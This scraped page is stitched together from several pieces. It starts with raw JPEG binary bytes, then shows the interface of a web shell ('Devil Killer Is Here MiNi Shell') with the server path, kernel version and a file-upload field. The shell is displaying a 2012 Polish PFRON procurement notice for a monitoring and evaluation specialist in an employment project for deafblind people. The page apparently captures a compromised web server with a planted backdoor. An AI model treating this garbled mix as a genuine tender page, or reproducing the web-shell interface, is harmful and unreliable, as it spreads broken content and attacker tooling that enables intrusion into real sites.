JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120116/13294-N-2012.html

<p class="kh_header"><b>Warszawa: Usługi Specjalisty ds. monitoringu i ewaluacji w projekcie pn. Wsparcie osób głuchoniewidomych na rynku pracy II - Weź sprawy w swoje ręce</b><br>
<b>Numer ogłoszenia: 13294 - 2012; data zamieszczenia: 16.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych w Warszawie , al. Jana Pawła II 13, 00-828 Warszawa, woj. mazowieckie, tel. 022 5055494, faks 022 5055275.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundusz celowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi Specjalisty ds. monitoringu i ewaluacji w projekcie pn. Wsparcie osób głuchoniewidomych na rynku pracy II - Weź sprawy w swoje ręce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Zlecenie zadań dotyczących świadczenia usług Specjalisty ds. monitoringu i ewaluacji w projekcie pn.Wsparcie osób głuchoniewidomych na rynku pracy II - Weź sprawy w swoje ręce w ramach Priorytetu 1 Programu Operacyjnego Kapitał Ludzki 2007-2013 Zatrudnienie i integracja społeczna, Działanie 1.3 Ogólnopolskie programy integracji i aktywizacji zawodowej, Poddziałanie 1.3.6. 
2	Zamawiający wymaga, aby Wykonawca będący pracodawcą zatrudnił na okres realizacji przedmiotu zamówienia, do jego realizacji 1 pracownika niepełnosprawnego, o którym mowa w przepisach o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (zgodnie z art. 29 ust 4 pkt 1b ustawy Prawo zamówień publicznych). W związku z tym Wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ. 
IV.	Dodatkowe informacje dotyczące przedmiotu zamówienia
1	Informacje o projekcie Wsparcie osób głuchoniewidomych na rynku pracy II  - Weź sprawy  
w swoje ręce:
1.1	Partner:  Towarzystwo Pomocy Głuchoniewidomych.
1.2	Okres realizacji projektu: 01.03.2010 r. - 31.12.2012 r.
1.3	Wartość projektu: 10 026 057,00 zł
1.4	Projekt przewiduje wsparcie dla 600 beneficjentów ostatecznych projektu, czyli osób głuchoniewidomych (OGN)  w wieku 16 -59/64 lat (odpowiednio dla kobiet i mężczyzn) oraz 
600 osób z  otoczenia BO, czyli rodzin i opiekunów OGN, a także innych osób z bliskiego otoczenia OGN. Projekt zakłada również przeszkolenie 10 specjalistów w obszarze zatrudniania wspomaganego. 
1.5	Realizacja projektu odbywa się w pięciu głównych obszarach: zarządzanie, rekrutację, wsparcie beneficjentów, wsparcie otoczenia beneficjentów oraz monitoring i ewaluację. Wsparcie zorganizowane jest wokół 5 makroregionów z siedzibą w Warszawie, Olsztynie, Wrocławiu, Gdańsku i Lublinie. 
1.6	Rezultaty twarde projektu:
- opracowanie indywidualnych diagnoz dla 450 osób głuchoniewidomych,
- poradnictwo zawodowe i opracowanie Indywidualnych Planów Działania dla 450 OGN,
- ukończenie przez 450 OGN warsztatów aktywizacji zawodowej,
- odbycie staży rehabilitacyjnych przez 80 OGN,
- ukończenie szkoleń zawodowych przez 50 OGN, 
- wsparcie dla 600 osób z najbliższego otoczenia BO,
- podjęcie pracy przez 80 OGN,
- kontynuacja lub rozpoczęcie nauki przez 160 OGN.
1.7.	Rezultaty miękkie:
- zwiększenie kompetencji w zakresie aktywności poszukiwania pracy u co najmniej 50% beneficjentów ostatecznych,
- zwiększenie wiedzy na temat funkcjonowania na rynku pracy u co najmniej 50% BO,
- wzrost odpowiedzialności za własny rozwój zawodowy u co najmniej 50% BO,
- zwiększenie umiejętności dotyczących interakcji społecznych u co najmniej 50% BO,
- zwiększenie umiejętności interpersonalnych (wzrost pewności siebie) u co najmniej 50% BO.
1.8.	Produkty projektu:
- strona internetowa projektu,
- 3 publikacje promujące aktywność zawodową osób głuchoniewidomych,
- konferencja podsumowująca efekty zatrudnieniowe projektu,
- 600 wypełnionych kwestionariuszy zgłoszeniowych,
- 450 wypełnionych Indywidualnych Planów Działania,
- 150 kompletów materiałów promocyjno- informacyjnych na konferencje,
- infolinia projektu,
- ok. 20 nagród w konkursie,
- ok. 240 kompletów materiałów warsztatowych,
- program szkolenia dla trenerów pracy,
- ok. 20 kompletów materiałów dydaktycznych  na szkolenia trenerów pracy,
-	ok. 850 kompletów materiałów dydaktycznych  na szkolenia dla otoczenia OGN.
2	Zakres zamówienia:
Wykonawca będzie odpowiedzialny za realizację zadań specjalisty ds. monitoringu i ewaluacji 
w projekcie, które wynikają z wniosku o dofinansowanie projektu Wsparcie osób głuchoniewidomych na rynku pracy II - Weź sprawy w swoje ręce, w  tym w szczególności za: 
a.	Wdrażanie strategii monitoringu i ewaluacji w projekcie pt. Wsparcie osób głuchoniewidomych 
na rynku pracy II - Weź sprawy w swoje ręce; 
b.	Przygotowanie dokumentacji w procesie monitoring-ewaluacja w tym: ankiet ewaluacyjnych, formularza mierzenia wskaźników miękkich; 
c.	Przygotowanie narzędzia badawczego; 
d.	Zbieranie ilościowych i jakościowych danych w projekcie od Partnera projektu; 
e.	Analizę zebranych danych ilościowych i jakościowych pod względem założonych rezultatów twardych i miękkich; 
f.	Przetwarzanie danych, nie będących danymi osobowymi, uzyskanych od Partnera zgodnie 
z założeniami strategii ewaluacji; 
g.	Ustalanie zagrożeń i kontrola jakości projektu; 
h.	Bieżący nadzór nad sprawozdawczością projektu; 
i.	Sprawozdawczość z poszczególnych etapów ewaluacji; 
j.	Opracowanie i przygotowanie raportu z badania ewaluacyjnego projektu; 
k.	Prowadzenie korespondencji merytorycznej z instytucjami nadrzędnymi i Partnerem; 
l.	Wizytowanie miejsc realizacji projektu;
m.	Archiwizowanie dokumentów w zakresie prowadzonych spraw; 
n.	Czynności pomocnicze do wykonania przedmiotu zamówienia.
VIII.	Termin realizacji zamówienia 
Zamówienie będzie realizowane od dnia podpisania umowy do dnia 31.12.2012 r.
XXIII.	Podwykonawstwo.
Zamawiający dopuszcza zlecenie wykonania przedmiotu zamówienia podwykonawcom w zakresie:
a.	Zbieranie ilościowych i jakościowych danych w projekcie od Partnera projektu; 
b.	Wizytowanie miejsc realizacji projektu;
c.	Archiwizowanie dokumentów w zakresie prowadzonych spraw..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.12.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>V.	Warunki udziału Wykonawców w postępowaniu oraz opis sposobu dokonywania oceny 
ich spełniania.
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy Pzp oraz wykażą brak podstaw do wykluczenia  
z powodu niespełniania warunków, o których mowa w art. 24 ust.1 ustawy Pzp, tj.:
1.1	 dysponują lub będą dysponować co najmniej 1 osobą posiadającą wykształcenie i kwalifikacje oraz doświadczenie a także zakres wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia w tym posiada łącznie: 	
  -   wykształcenie wyższe magisterskie;
-	wykształcenie wyższe z zakresu socjologii;
-   doświadczenie w pracy w projektach na rzecz osób niepełnosprawnych;
-	minimum roczne doświadczenie zawodowe w zakresie ewaluacji, w tym co najmniej 6 miesięczne doświadczenie w ewaluacji projektów unijnych, 
1.2	 posiadają wiedzę i doświadczenie: tzn. w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali 
a w przypadku świadczeń okresowych lub ciągłych również wykonują należycie usługę  przygotowania raportu z przeprowadzonego badania ewaluacyjnego.	

Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia/nie spełnia na podstawie dokumentów załączonych do oferty. Z treści załączonych oświadczeń i dokumentów winno jednoznacznie wynikać, że Wykonawca spełnia ww. warunki.
Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania im do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

VI.	Dokumenty wymagane w celu wykazania braku podstaw do wykluczenia z postępowania 
i potwierdzenia spełnienia warunków udziału w postępowaniu. 
1.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy. 
2.	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp oraz o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków określonych w art. 24 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 2 do SIWZ. 
3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia oraz informacje o podstawie do dysponowania tymi osobami (np. pisemne zobowiązanie innego podmiotu do udostępnienia wskazanych osób zdolnych do wykonania zamówienia), jeśli Wykonawca wskazał takie osoby w wykazie, wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych i doświadczenia a także zakresu wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia, które spełniają warunki określone w rozdziale V pkt 1.1 SIWZ (zgodnie z załącznikiem nr 3 do SIWZ) 
4.	Oświadczenie potwierdzające, że osoba/osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane wykształcenie i kwalifikacje oraz doświadczenie a także zakres wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia określonych w rozdziale 
V pkt 1.1 SIWZ.
5.	Wykaz wykonanych usług (zgodnie z załącznikiem nr 5 do SIWZ), potwierdzających spełnianie warunku określonego w rozdziale V pkt 1.2 SIWZ wraz z dokumentami potwierdzającymi, 
że wymienione usługi zostały wykonane należycie (np. referencje). 
UWAGA:
6. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa:
6.1	w pkt 1 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę 
lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
6.2	Dokumenty, o których mowa w pkt 6.1 lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

VII.	Informacja dla Wykonawców, którzy wspólnie składają ofertę (spółki cywilne-konsorcja)

1.	W przypadku podmiotów wspólnie ubiegających się o zamówienie każdy z Wykonawców musi złożyć dokumenty, o których mowa w pkt 1 rozdziału VI Specyfikacji, oświadczenie wymienione w rozdziale VI pkt 2 Specyfikacji (Załącznik nr 2 do Specyfikacji) może być złożone przez każdego z tych Wykonawców (na jednym dokumencie pieczęcie i podpisy wszystkich Wykonawców) lub przez pełnomocnika, o którym mowa w pkt 2. Dokument wymieniony w rozdziale VI pkt 3, 4 i 5 Specyfikacji winien przedłożyć w imieniu wszystkich Wykonawca lub Wykonawcy, którzy spełniają wymagany warunek łącznie. 
2.	Wykonawcy ci ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. 
3.	W związku z faktem, iż wszelka korespondencja związana z postępowaniem będzie kierowana do ustanowionego przez Wykonawców pełnomocnika należy podać adres pełnomocnika na jaki ma być wysyłana korespondencja. 
4.	Pełnomocnictwo dla ustanowionego pełnomocnika powinno jednoznacznie określać postępowanie, do którego się odnosi, precyzować zakres umocowania i wskazywać pełnomocnika. Musi też wyliczać wszystkich Wykonawców wspólnie ubiegających się o zamówienie i być podpisane przez każdego z nich. 
5.	Pełnomocnictwo musi być dołączone do oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) i będzie tożsame z pełnomocnictwem do podpisywania oferty, o którym mowa w pkt 5 rozdziału XVI Specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2	 posiadają wiedzę i doświadczenie: tzn. w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali 
a w przypadku świadczeń okresowych lub ciągłych również wykonują należycie usługę  przygotowania raportu z przeprowadzonego badania ewaluacyjnego.	
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia- nie spełnia na podstawie dokumentów załączonych do oferty. Z treści załączonych oświadczeń i dokumentów winno jednoznacznie wynikać, że Wykonawca spełnia ww. warunki.
Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania im do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
VI.	Dokumenty wymagane w celu wykazania braku podstaw do wykluczenia z postępowania 
i potwierdzenia spełnienia warunków udziału w postępowaniu. 
5.	Wykaz wykonanych usług (zgodnie z załącznikiem nr 5 do SIWZ), potwierdzających spełnianie warunku określonego w rozdziale V pkt 1.2 SIWZ wraz z dokumentami potwierdzającymi, 
że wymienione usługi zostały wykonane należycie (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponować co najmniej 1 osobą posiadającą wykształcenie i kwalifikacje oraz doświadczenie a także zakres wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia w tym posiada łącznie: 	
  -   wykształcenie wyższe magisterskie;
-	wykształcenie wyższe z zakresu socjologii;
-   doświadczenie w pracy w projektach na rzecz osób niepełnosprawnych;
-	minimum roczne doświadczenie zawodowe w zakresie ewaluacji, w tym co najmniej 6 miesięczne doświadczenie w ewaluacji projektów unijnych, 
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia-nie spełnia na podstawie dokumentów załączonych do oferty. Z treści załączonych oświadczeń i dokumentów winno jednoznacznie wynikać, że Wykonawca spełnia ww. warunki.
Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania im do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia oraz informacje o podstawie do dysponowania tymi osobami (np. pisemne zobowiązanie innego podmiotu do udostępnienia wskazanych osób zdolnych do wykonania zamówienia), jeśli Wykonawca wskazał takie osoby w wykazie, wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych i doświadczenia a także zakresu wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia, które spełniają warunki określone w rozdziale V pkt 1.1 SIWZ (zgodnie z załącznikiem nr 3 do SIWZ) 
4.	Oświadczenie potwierdzające, że osoba/osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane wykształcenie i kwalifikacje oraz doświadczenie a także zakres wykonywanych przez nie czynności  niezbędnych do wykonania zamówienia określonych w rozdziale 
V pkt 1.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument wymagany do oferty: Oświadczenie o zatrudnieniu na okres realizacji przedmiotu zamówienia, 1 pracownika niepełnosprawnego (załącznik nr 4 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje zmiany w zakresie terminu realizacji i odbioru usług, jeżeli wystąpią obiektywne przyczyny niemożliwe do przewidzenia w chwili zawarcia Umowy. Zamawiający w uzasadnionych przypadkach, których nie można było przewidzieć, może wyznaczyć za porozumieniem Stron dłuższy termin na wykonanie przedmiotu Umowy, maksymalnie o 90 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pfron.bip.org.pl/?tree=554<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych 
00-828  Warszawa ,  Al. Jana Pawła II nr 13.</p>
